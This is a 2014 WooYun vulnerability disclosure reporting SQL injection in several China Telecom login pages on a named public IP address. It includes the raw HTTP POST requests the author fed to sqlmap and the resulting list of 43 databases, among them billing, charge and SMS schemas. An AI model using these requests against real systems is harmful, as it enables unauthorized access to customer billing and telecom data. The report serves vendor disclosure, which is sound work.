当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074484

漏洞标题:中国电信某处系统SQL注入集合

相关厂商:中国电信

漏洞作者: scanf

提交时间:2014-09-01 14:21

修复时间:2014-10-16 14:22

公开时间:2014-10-16 14:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-01: 细节已通知厂商并且等待厂商处理中
2014-09-06: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-16: 细节向公众公开

简要描述:

这个可以对账的吧,呵呵.
明天去学校报到了,唉.
什么积分兑换系统
帐话单查询系统
用户状态查询啊
主要是明天要去学校报道了
就不能愉快的刷洞了
想想就无爱.

详细说明:

http://202.98.116.80/crmrpt/login.aspx

QQ截图20140830215004.png


然后果断用sqlmap跑
post请求

POST /crmrpt/login.aspx HTTP/1.1
Host: 202.98.116.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.98.116.80/crmrpt/login.aspx
Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
__VIEWSTATE=dDwtNjAwMjg5NTQzOzs%2Bw%2BWZccNnWuUBcDGfRVXIbvr5SKA%3D&TextBoxPass=admin&TextBoxUsr=admin&ButtonLogin=%E7%99%BB%E5%BD%95


available databases [43]:
[*] APEX_030200
[*] APPQOSSYS
[*] BILLING
[*] BUSINESS_SIGN
[*] CHARGE
[*] CTXSYS
[*] CYP
[*] DATA
[*] DBSNMP
[*] DEBITPAY
[*] DQRPT
[*] EXCSCORE
[*] EXFSYS
[*] FILE
[*] FLOWS_FILES
[*] INTF_HAOBAI
[*] INTF_NET
[*] INTF_NET_QRY
[*] LANBIN
[*] LOCALRPT
[*] LOG
[*] MARKET
[*] MDSYS
[*] NETSMS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RPAY
[*] SCOTT
[*] SMSRPT
[*] SYN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TZY
[*] WATERKING
[*] WD
[*] WMSYS
[*] XDB
[*] ZYADJ
[*] ZYSMS


QQ截图20140830215316.png


漏洞证明:

估计是OA网或是97网的,不然怎么没过滤
http://202.98.116.80/jifen/login.aspx 积分兑换系统
POST请求

POST /jifen/login.aspx HTTP/1.1
Host: 202.98.116.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.98.116.80/jifen/login.aspx
Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
__VIEWSTATE=dDwtMzc1MTI5NDQ5Ozs%2B9Gax3NXBFtaiGW5D6Zkb0MhNsz4%3D&TextBoxPwd=111111111&TextBoxUsr=111111111&ButtonLogin=%E7%99%BB%E5%BD%95


QQ截图20140830221648.png


http://202.98.116.80/qd/login.aspx 营帐话单查询
post请求

POST /qd/login.aspx HTTP/1.1
Host: 202.98.116.80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.98.116.80/qd/login.aspx
Cookie: ASP.NET_SessionId=4pr1isiz3fb2m03wbvz3ox25
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
__VIEWSTATE=dDwtMTUyMTI0NTcxMTs7PsbU0cV6c7TeZDHUxCOtWnV4AZ%2Bu&TextBoxPwd=0000000000&TextBoxStaff=000000000&Button1=%E7%99%BB%E5%BD%95


QQ截图20140830222311.png

修复方案:

过滤吧 这个OA网的外网也能访问的话得做好安全措施

版权声明:转载请注明来源 scanf@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-06 09:05

厂商回复:

最新状态:

暂无